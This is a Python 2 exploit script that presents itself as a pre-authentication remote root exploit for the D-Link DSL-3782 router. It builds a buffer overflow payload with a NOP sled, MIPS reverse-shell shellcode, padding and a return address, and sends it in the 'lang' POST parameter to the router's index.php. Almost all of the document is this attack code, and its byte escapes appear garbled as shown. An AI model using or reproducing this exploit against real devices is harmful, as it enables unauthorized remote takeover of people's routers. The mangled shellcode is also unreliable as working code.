D-Link DSL-3782 pre-authentication remote root exploit.
#!/usr/bin/python2
# preauth rece for dlink dsl-3782
# found: 06.11.2021
# pwned: 18.112021 @ 19:26
#
import sys
import urllib2 # requests
import urllib
import struct
target = 'http://192.168.0.50/index.php' # cgi-bin/ChgLang.asp'
nopsled = ""
# NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
for i in range(74):
nopsled += "x41x41x41x41" # 26x40x08x01"
#print("nopsled len: %s" % len(nopsled))
#print(len(nopsled))
# shellcode; revshell: 272-232=?:
buf = b""
buf += b"x27xbdxffxe0x24x0exffxfdx01xc0x20x27x01"
buf += b"xc0x28x27x28x06xffxffx24x02x10x57x01x01"
buf += b"x01x0cx30x50xffxffx24x0exffxefx01xc0x70"
buf += b"x27x24x0dxffxfdx01xa0x68x27x01xcdx68x04"
buf += b"x24x0ex27x0fx01xaex68x25xafxadxffxe0xaf"
buf += b"xa0xffxe4xafxa0xffxe8xafxa0xffxecx02x10"
buf += b"x20x25x24x0exffxefx01xc0x30x27x23xa5xff"
buf += b"xe0x24x02x10x49x01x01x01x0cx02x10x20x25"
buf += b"x24x05x01x01x24x02x10x4ex01x01x01x0cx02"
buf += b"x10x20x25x28x05xffxffx28x06xffxffx24x02"
buf += b"x10x48x01x01x01x0cxafxa2xffxffx24x11xff"
buf += b"xfdx02x20x88x27x8fxa4xffxffx02x20x28x21"
buf += b"x24x02x0fxdfx01x01x01x0cx24x10xffxffx22"
buf += b"x31xffxffx16x30xffxfax28x06xffxffx3cx0f"
buf += b"x2fx2fx35xefx62x69xafxafxffxecx3cx0ex6e"
buf += b"x2fx35xcex73x68xafxaexffxf0xafxa0xffxf4"
buf += b"x27xa4xffxecxafxa4xffxf8xafxa0xffxfcx27"
buf += b"xa5xffxf8x24x02x0fxabx01x01x01x0c"
shellcode = buf
#shellcode = ( "D" * 276 )
ret = struct.pack(">I", 0x7fff45b0) # ;] 0x7fff4528) # 0x2abccbb0) # system(); 0x2b269fcc) # SELECT... x2accefcc) # 0x123456) # 0x42424242)
junk = "A" * 68 # 136 # 264 # (596 - len(shellcode) - len(ret)) # - len(nopsled))
###############
#payload = junk + shellcode + ret
payload = nopsled + shellcode + junk + ret
#print(len(payload))
print(payload)
data = urllib.urlencode({'lang' : payload })
sendme = urllib2.Request(target, data ) # url=target, data=post_me)
#print(sendme)
#print "DONE"
